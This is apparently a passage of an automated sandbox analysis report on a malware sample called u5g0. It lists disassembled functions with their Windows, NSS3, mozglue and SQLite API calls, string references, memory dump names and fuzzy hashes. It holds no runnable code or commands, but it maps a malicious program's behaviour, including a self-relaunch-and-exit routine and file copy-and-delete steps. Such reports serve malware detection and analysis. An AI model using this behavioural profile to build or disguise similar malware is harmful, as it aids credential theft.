Opcode Fuzzy Hash: 6ece8f90a5e9c96c819a443f693d3030017b725595645da224d6b2efd62f82e0
Instruction Fuzzy Hash: 6421BA75D14209ABCB14EFE4D945AEEB7BABF4C305F04852EE50AE3250EB345644CB68

Uniqueness

Uniqueness Score: -1.00%

Function 6BC6BA40 Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BC6BA51
TlsGetValue.KERNEL32 ref: 6BC6BA6B
EnterCriticalSection.KERNEL32 ref: 6BC6BA83
TlsGetValue.KERNEL32 ref: 6BC6BAA1
_PR_MD_UNLOCK.NSS3 ref: 6BC6BAC0

Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607AD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607CD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607D6
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BBF204A), ref: 6BC607E4
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,6BBF204A), ref: 6BC60864
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BC60880
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,6BBF204A), ref: 6BC608CB
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608D7
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608FB

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Value$calloc$CriticalEnterSection
String ID:
API String ID: 2444776475-0
Opcode ID: ca04ec1b986ca3fb0457869319c66994f0a91ea68a4cb461f7be39ae8ec7003e
Instruction ID: 71d7a64daa4581c45fd548ef10bc7172fea10b5555e2b1e70f8dff8e3e0485a7
Opcode Fuzzy Hash: ca04ec1b986ca3fb0457869319c66994f0a91ea68a4cb461f7be39ae8ec7003e
Instruction Fuzzy Hash: AE2183759142058BEB006F79C5C6569B7B4FF42394F098978ED88CF202FB34D585CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BD04AF0 Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

PR_MemUnmap.NSS3(00015180,00000005,?,6BD04AD1), ref: 6BD04B62
free.MOZGLUE(?,00015180,00000005,?,6BD04AD1), ref: 6BD04B76

Part of subcall function 6BD003C0: CloseHandle.KERNEL32(?,?,?,?,6BD04B27,?,?,00015180,00000005,?,6BD04AD1), ref: 6BD003E0
Part of subcall function 6BD003C0: GetLastError.KERNEL32(?,6BD04B27,?,?,00015180,00000005,?,6BD04AD1), ref: 6BD003FD

Part of subcall function 6BD003C0: DeleteCriticalSection.KERNEL32(00000005,?,?,?,6BD04B27,?,?,00015180,00000005,?,6BD04AD1), ref: 6BD00419
Part of subcall function 6BD003C0: free.MOZGLUE(?,?,6BD04B27,?,?,00015180,00000005,?,6BD04AD1), ref: 6BD00420

CloseHandle.KERNEL32(?,00015180,00000005,?,6BD04AD1), ref: 6BD04B96
free.MOZGLUE(?,?,6BD04AD1), ref: 6BD04B9D
memset.VCRUNTIME140(6BDD2F9C,00000000,00000090,00015180,00000005,?,6BD04AD1), ref: 6BD04BB2

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: free$CloseHandle$CriticalDeleteErrorLastSectionUnmapmemset
String ID:
API String ID: 447902086-0
Opcode ID: 2496dab5518637fd84b2af03af3e0570d2008ea917af016da45135af45b6f32d
Instruction ID: 345a5dece9f8d3e399ebde9aa62d5e7f305999d75e674c692b575dd350d798fe
Opcode Fuzzy Hash: 2496dab5518637fd84b2af03af3e0570d2008ea917af016da45135af45b6f32d
Instruction Fuzzy Hash: 811100B2801100EBEE208F65CC05F6AB739ABA2278F040434E5889F114EB29E111EBE6

Uniqueness

Uniqueness Score: -1.00%

Function 6BC73B50 Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BC73B69
EnterCriticalSection.KERNEL32(?), ref: 6BC73B79
PL_HashTableLookup.NSS3(?), ref: 6BC73B89
PR_Unlock.NSS3 ref: 6BC73B99
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6BC73BC6

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: CriticalEnterErrorHashLookupSectionTableUnlockValue
String ID:
API String ID: 1499782032-0
Opcode ID: 212bfed54cd5b6d0e48f3d735f3e7a5fd0373639bf18e3d6990af6462ca12810
Instruction ID: 1b157c6ffae8631ff1ec42a7db31a1f59a2b3156969ff2aab7ee3f7f3a0a3003
Opcode Fuzzy Hash: 212bfed54cd5b6d0e48f3d735f3e7a5fd0373639bf18e3d6990af6462ca12810
Instruction Fuzzy Hash: 64116B31A24500ABFB316F78DC86E22B768FBC2758F0445B1ED488B210F736EA4583D0

Uniqueness

Uniqueness Score: -1.00%

Function 6BC73BF0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BC73C0E
EnterCriticalSection.KERNEL32 ref: 6BC73C23
PL_HashTableLookup.NSS3 ref: 6BC73C3B
SECITEM_DupItem_Util.NSS3 ref: 6BC73C47
PR_Unlock.NSS3 ref: 6BC73C5E

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: CriticalEnterHashItem_LookupSectionTableUnlockUtilValue
String ID:
API String ID: 1352239609-0
Opcode ID: 4ea44507b442c477f1da9924977e7bdf8a6f29aab62f0e2e0241a6c55f358bc8
Instruction ID: ce5be5142a6c4457c6473a8ba21c286f9bcc6ba6ae6f76ec95ee41cd983972c0
Opcode Fuzzy Hash: 4ea44507b442c477f1da9924977e7bdf8a6f29aab62f0e2e0241a6c55f358bc8
Instruction Fuzzy Hash: 9C01ADB59546158BEB20BF7CC0C942AFBE8AB85654B010A39D8D8CB200F734D995CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6BD82A40 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6BD82A5B
free.MOZGLUE(?), ref: 6BD82A6D
strdup.MOZGLUE(?), ref: 6BD82A7B
PR_SetError.NSS3(FFFFE890,00000000), ref: 6BD82A96
PR_ExitMonitor.NSS3 ref: 6BD82AB5

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Monitor$EnterErrorExitfreestrdup
String ID:
API String ID: 1948362043-0
Opcode ID: da79f1c92505a5b7181b73cee8145accd80afed59e989b64883ce78e0d0516b4
Instruction ID: 34558a7ed9fdf4260bf087bfa958a4d0263124aa2b287621af198ceab99ca1d5
Opcode Fuzzy Hash: da79f1c92505a5b7181b73cee8145accd80afed59e989b64883ce78e0d0516b4
Instruction Fuzzy Hash: F2F0A4B5D0013097FE209FB4EC06B06B718EF426ADF080070D84A9E102E739D914C7DA

Uniqueness

Uniqueness Score: -1.00%

Function 004185A7 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004185B3

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__getptd.LIBCMT ref: 004185CA
__amsg_exit.LIBCMT ref: 004185D8
__lock.LIBCMT ref: 004185E8
__updatetlocinfoEx_nolock.LIBCMT ref: 004185FC

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction ID: cdd0eec35e4bf80da2317afb9b55000317a90f0185e5a3c9ee5e330d7cc08b67
Opcode Fuzzy Hash: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction Fuzzy Hash: A4F09632A49710AAD721BBBA9C027CA77B1AF00739F10411FF505A62D2CF6C69C1CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 6BD42B20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00020C24,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6BD42B64

Strings

misuse, xrefs: 6BD42B58
%s at line %d of [%.10s], xrefs: 6BD42B5D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BD42B4E

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 632333372-648709467
Opcode ID: d5f3b85e6ba61e34288834db6ad191a123850195be3d73812528bf1e571b2004
Instruction ID: 8038965342aaba9647ca9d79b8872fd837d3560965c49e44543f075c2e580a69
Opcode Fuzzy Hash: d5f3b85e6ba61e34288834db6ad191a123850195be3d73812528bf1e571b2004
Instruction Fuzzy Hash: D251E274B202068BEB04CF68C8817AFB7A2AF89328F04417DC859DF345E779D945C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC04AC0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000B2F5), ref: 6BC04C2B

Strings

winWrite2, xrefs: 6BC04C01
winWrite1, xrefs: 6BC04BC2
delayed %dms for lock/sharing conflict at line %d, xrefs: 6BC04C24

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: sqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
API String ID: 632333372-1808655853
Opcode ID: 8f43b7f8f7340006ea3eb7c65a74bad3b7c0ac40c047f3a702a12588755689c8
Instruction ID: 581c8a53d36c078cf82b4a7210ab0b2b7261f19ea67716668ef5d834d660e569
Opcode Fuzzy Hash: 8f43b7f8f7340006ea3eb7c65a74bad3b7c0ac40c047f3a702a12588755689c8
Instruction Fuzzy Hash: 5741A271A147069BD704CF29C841A5FBBF9FFD5364F108A69F8548B290EB35DA048B91

Uniqueness

Uniqueness Score: -1.00%

Function 6BD46B20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

sqlite3_snprintf.NSS3(?,6BD46AC0,6BDAAAF9,00000000,?,6BD46AC0,?), ref: 6BD46BA9
sqlite3_free.NSS3(00000000,?,?,?,?,?,6BD46AC0,?), ref: 6BD46BB2
sqlite3_snprintf.NSS3(?,6BD46AC0,OsError 0x%lx (%lu),00000000,00000000,?,6BD46AC0,?), ref: 6BD46BD9

Strings

OsError 0x%lx (%lu), xrefs: 6BD46BCE

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: sqlite3_snprintf$sqlite3_free
String ID: OsError 0x%lx (%lu)
API String ID: 2089385377-3720535092
Opcode ID: 91378b3edb7163030ac498ec451b69517b09910cab3a387005d836bc412c97d9
Instruction ID: 5a5c0477a8003af7274e06becb5028034639f8af1ccfbd600232a16a5307c8ed
Opcode Fuzzy Hash: 91378b3edb7163030ac498ec451b69517b09910cab3a387005d836bc412c97d9
Instruction Fuzzy Hash: 5911A2B5A00105ABEB089FA5EC8AD7FBB79EF86755700003CE5465B241EB349D04CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 004132F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00413323

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

ShellExecuteEx.SHELL32(0000003C), ref: 004133E6
ExitProcess.KERNEL32 ref: 00413415

Strings

<, xrefs: 00413399

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: a3468312e327505d30a8ea3f6a47c702c32c3979f17eb118853ea14e49755041
Instruction ID: 9270ca21e45796c21bf284f368f95b7d0dbf71ea93a5a7258f1c6a627d8bac6b
Opcode Fuzzy Hash: a3468312e327505d30a8ea3f6a47c702c32c3979f17eb118853ea14e49755041
Instruction Fuzzy Hash: 383144B19012189BDB14EB91DD91FDDBB78AF48304F80518DF20566191DF746B89CF9C

Uniqueness

Uniqueness Score: -1.00%

Function 6BD3DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00005919,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,6BD3DC98,?,?,?,?), ref: 6BD3DBC4

Strings

misuse, xrefs: 6BD3DBB8
%s at line %d of [%.10s], xrefs: 6BD3DBBD
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BD3DBAE

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 632333372-648709467
Opcode ID: 61f461560d742ca68b21ef71d8f61fd9da6c7da86f90f5383f80cd212564de88
Instruction ID: 3d67ad6fa680c1f4a62117ad8b4cef028a351088bc7b7fc806f1a56f00c81f16
Opcode Fuzzy Hash: 61f461560d742ca68b21ef71d8f61fd9da6c7da86f90f5383f80cd212564de88
Instruction Fuzzy Hash: D71106B97902269BEB04CF68E891A56776AFBCB321B044079ED498F341D739EC01CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6BC5AB80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BC5AB8A
PR_SetError.NSS3(FFFFE897,00000000), ref: 6BC5AC07

Part of subcall function 6BD1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BD1C2BF

PR_LogPrint.NSS3(connect -> %d,00000000), ref: 6BC5AC1A

Strings

connect -> %d, xrefs: 6BC5AC15

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Value$ErrorPrint
String ID: connect -> %d
API String ID: 1784924131-3487059786
Opcode ID: b1739365832581d5964725777bcfc9380a09cc50e753d202017f9afcc07b51d0
Instruction ID: 29bc9797ec45c26622b277b3c77ef21c3d8d73b2bc6f0eb69ac82614cb71fd40
Opcode Fuzzy Hash: b1739365832581d5964725777bcfc9380a09cc50e753d202017f9afcc07b51d0
Instruction Fuzzy Hash: B1012632A101045BF7002F39DC06B7A3B52EB82369F4885B4F9998E161F7399AB083F5

Uniqueness

Uniqueness Score: -1.00%

Function 6BD82BE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6BD82BFA
PR_ExitMonitor.NSS3 ref: 6BD82C2B
PR_LogPrint.NSS3(%s incr => %d (for %s),?,?,?), ref: 6BD82C5D

Strings

%s incr => %d (for %s), xrefs: 6BD82C58

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Monitor$EnterExitPrint
String ID: %s incr => %d (for %s)
API String ID: 2736670396-2912983388
Opcode ID: acad09923d04df2cb4b9ddb895cf789d80ee1a7ff042c6498a9c43e9ed4bd2f4
Instruction ID: 61eb84aabbf1494fd44e2de3e21664ff3d857fa5d1fa2904af8b6e46b681502d
Opcode Fuzzy Hash: acad09923d04df2cb4b9ddb895cf789d80ee1a7ff042c6498a9c43e9ed4bd2f4
Instruction Fuzzy Hash: ED014CB5A001209FFB118F24DC80A27B3B9EB8577DB044479D8499F211EB39ED04C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00415450 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
wsprintfW.USER32 ref: 00415478

Strings

%hs, xrefs: 0041546F

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction ID: 2a04a3b42468460cff415e79ad4cc7303691da2b1e165ac812b33aed5ccf4e4e
Opcode Fuzzy Hash: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction Fuzzy Hash: A5E0ECB5A40608BFDB20DFD4ED0AEAD77A9EB48701F100194F90AD7640DA719E109B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB50 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F31E18,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CBD1
lstrlen.KERNEL32(00000000), ref: 0040CDE8
lstrlen.KERNEL32(00000000), ref: 0040CDFC
DeleteFileA.KERNEL32(00000000), ref: 0040CE75

Memory Dump Source

